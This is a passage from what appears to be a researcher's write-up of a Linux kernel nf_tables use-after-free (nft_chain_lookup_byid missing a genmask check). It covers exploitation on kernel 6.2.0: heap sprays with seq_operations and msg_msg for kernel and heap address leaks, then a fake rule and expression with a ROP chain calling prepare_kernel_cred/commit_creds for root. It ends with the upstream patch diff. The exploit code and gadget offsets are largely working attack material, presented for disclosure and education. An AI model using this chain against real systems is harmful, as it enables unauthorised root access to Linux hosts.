}
chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]);
}
It is possible to leak data via reading from chain->name. However, as chain->name is treated as a string, it is only possible to print data up to a null byte.
To obtain a kernel text leak, struct seq_operations
was chosen as the spray object. In kernel version 6.2.0, struct seq_operations
is allocated in the kmalloc-cg-32
cache by the function single_open
in fs/seq_file.c. This object is perfect for leaking as it contains a pointer to a kernel text pointer (the single_start
function).
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
struct seq_operations
was sprayed to reclaim the freed space originally occupied by chain->name [8]. chain->name was then read to obtain a text leak, which can be used to calculate the kernel base [9].
// Spray seq_operations to fill up kmalloc-cg-32 (chain->name)
printf("[+] Spray seq_operations to fill up kmalloc-cg-32 chain->name\n");
for (int i = 0; i < NUM_SEQOPS; i++) {
seqops[i] = open("/proc/self/stat", O_RDONLY); <-- [8]
if (seqops[i] < 0) {
perror("[!] open");
exit(-1);
}
}
// Get kernel text address leak of single_start and calculate kbase
char kbase_leak[0x10+1];
uint64_t k_single_start = 0; // 0x4b2470 offset
uint64_t kbase = 0;
int err = 0;
printf("[+] Getting leak\n");
// Leak
struct nftnl_rule *rleak = nftnl_rule_alloc();
nftnl_rule_set_u32(rleak, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(rleak, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(rleak, NFTNL_RULE_CHAIN, "chain2");
rseq = seq;
nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, NFPROTO_IPV4, NLM_F_DUMP, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rleak);
mnl_socket_sendto(nl, buf, nlh->nlmsg_len);
while (rseq < seq) {
err = mnl_socket_recvfrom(nl, buf, sizeof(buf));
err = mnl_cb_run(buf, err, rseq, mnl_socket_get_portid(nl), leak_cb, leak_expr_cb);
rseq += err == 0;
}
nftnl_rule_free(rleak);
kbase = number - 0x4b2470; <-- [9]
printf("[+] Kernel base: 0x%llx\n", kbase);
Ideally, to have enough space for our fake struct nft_rule
, struct nft_expr
and struct nft_expr_ops
, we would like to have a kmalloc-cg-1024 heap leak (where we can allocate the struct msg_msg
which contains all our fake objects). However, kmalloc-cg-1024 addresses will always end with a null byte, hence preventing us from directly printing the address via chain->name.
In order to circumvent this limitation, we will spray struct msg_msg
in the following way as shown below (prev pointers are omitted for simplicity):
In a single message queue, there will be:
We will first attempt to leak a kmalloc-cg-96
pointer via the UAF read from the freed chain. chain->name would point to the next pointer of the primary message, which would be the address of the secondary message. A size of 96 bytes was chosen as since kmalloc-cg-96
cache objects are small, there is a much lower probability that the last byte of the address would be 0x0 and cause our leak to truncate and fail.
After obtaining a valid kmalloc-cg-96
heap pointer, we now want to leak the kmalloc-cg-1024
heap pointer. The next pointer of the secondary message points to the third message, which is allocated in kmalloc-cg-1024
. We also know that the struct nft_chain
object (which is now freed) was allocated in kmalloc-cg-128
. To obtain the leak, we spray a fourth message of size 128 into the space of the freed chain object, and set the fake chain->name to the address of the kmalloc-cg-96
pointer + 1 to bypass the null byte. This is shown in the diagram below:
We can now read from chain->name to obtain a kmalloc-cg-1024
pointer.
When a new rule is added to a base chain, the following functions are called to ensure that the ruleset will not result in any loops:
nf_tables_newrule
-> nft_table_validate
-> nft_chain_validate
-> expr->ops->validate
When nft_chain_validate
is called, the expressions from the rules in the chain will be validated. nftables will use struct list_head rules
in the nft_chain
structure to determine what rules belong to the chain. However, we are able to control the space previously occupied by the freed target chain. This means that if we create a fake rule, with a fake expression and fake expression ops pointing to our ROP chain, and then spray a fake chain to reclaim the space of the freed target chain, and finally add a new rule to a base chain, we are able to kick off this chain of functions that will allow us to control RIP.
We first free the third message (size 1024) and the fourth message (size 128) which was used to leak the heap pointer. We then construct a fake rule, fake expression, fake expression ops and ROP chain in the data section of a struct msg_msg
and spray that as our third message. The fake structures and ROP chain can be seen below:
// Do all the ROP stuff in kmalloc-cg-1024
printf("[+] PHASE 3: ROP\n");
uint64_t fake_rule_addr = kheap_1024 + 0x230;
printf("[+] Fake rule address: 0x%llx\n", fake_rule_addr);
uint64_t fake_expr_addr = kheap_1024 + 0x260;
printf("[+] Fake expr ops: 0x%llx\n", fake_expr_addr);
// Make a fake rule
memset(&msg_three, 0, sizeof(msg_three));
*(long *)&msg_three.mtype = 0x43;
*(uint8_t *)&msg_three.mtext[0x215] = 0x10;
*(long *)&msg_three.mtext[0x218] = fake_expr_addr;
*(long *)&msg_three.mtext[0x278] = kbase + 0xba612a; // First rop point
// 0xffffffff81ba612a : push rsi ; jmp qword ptr [rsi - 0x7f]
// ROP!!!
*(long *)&msg_three.mtext[0x199] = kbase + 0xd58be; // Second rop point
// 0xffffffff810d58be : pop rsp ; pop r15 ; ret
*(long *)&msg_three.mtext[0x220] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x228] = kbase + 0x2a1b600; // init_task
*(long *)&msg_three.mtext[0x230] = kbase + 0x126bc0; // prepare_kernel_cred()
*(long *)&msg_three.mtext[0x238] = kbase + 0xcb0f92; // pop rsi ; ret
// 0xffffffff81cb0f92 : pop rsi ; ret 0
*(long *)&msg_three.mtext[0x240] = kheap_1024 + 0x3a0 + 48 + 0x70; // rsi
*(long *)&msg_three.mtext[0x248] = kbase + 0xd287b6;
// 0xffffffff81d287b6 : push rax ; jmp qword ptr [rsi - 0x70]
// Jump point after push rax
*(long *)&msg_three.mtext[0x3a0] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x250] = kbase + 0x1268e0; // commit_creds()
*(long *)&msg_three.mtext[0x258] = kbase + 0xad163; // 4 pop
*(long *)&msg_three.mtext[0x280] = kbase + 0x12011cb; // swapgs, iretq
*(long *)&msg_three.mtext[0x288] = user_rip;
*(long *)&msg_three.mtext[0x290] = user_cs;
*(long *)&msg_three.mtext[0x298] = user_rflags;
*(long *)&msg_three.mtext[0x2a0] = user_sp;
*(long *)&msg_three.mtext[0x2a8] = user_ss;
// Spray msg_msg of size 1024
for (int i = 0; i < NUM_MSQIDS; i++) {
if (msgsnd(msqid[i], &msg_three, sizeof(msg_three) - sizeof(long), 0) < 0) {
perror("[!] msg_msg spray failed");
exit(-1);
}
}
We then spray a fourth struct msg_msg
which will act as our fake chain. Shown below is a summary of the objects involved:
To kick off the ROP chain, simply add a new rule to the previously created base chain “chain2”, and enjoy your root shell!
To patch the bug, simply check the genmask when looking up a chain by its ID.
net/netfilter/nf_tables_api.c | 11 +++++++----
1 file changed, 7 insertions(+), 4 deletions(-)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2694,7 +2694,7 @@ static int nf_tables_updchain(struct nft_ctx *ctx, u8 genmask, u8 policy,
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
const struct nft_table *table,
- const struct nlattr *nla)
+ const struct nlattr *nla, u8 genmask)
{
struct nftables_pernet *nft_net = nft_pernet(net);
u32 id = ntohl(nla_get_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
if (trans->msg_type == NFT_MSG_NEWCHAIN &&
chain->table == table &&
- id == nft_trans_chain_id(trans))
+ id == nft_trans_chain_id(trans) &&
+ nft_active_genmask(chain, genmask))
return chain;
}
return ERR_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
return -EOPNOTSUPP;
} else if (nla[NFTA_RULE_CHAIN_ID]) {
- chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
+ chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+ genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
genmask);
} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
chain = nft_chain_lookup_byid(ctx->net, ctx->table,
- tb[NFTA_VERDICT_CHAIN_ID]);
+ tb[NFTA_VERDICT_CHAIN_ID],
+ genmask);
if (IS_ERR(chain))
return PTR_ERR(chain);
} else {
Here is a demonstration of the exploit in action:
The exploit script can be obtained here
I would like to thank my mentor Billy for teaching me so many cool techniques and guiding me, Jacob for giving me this internship opportunity, and everyone else at STAR Labs! :D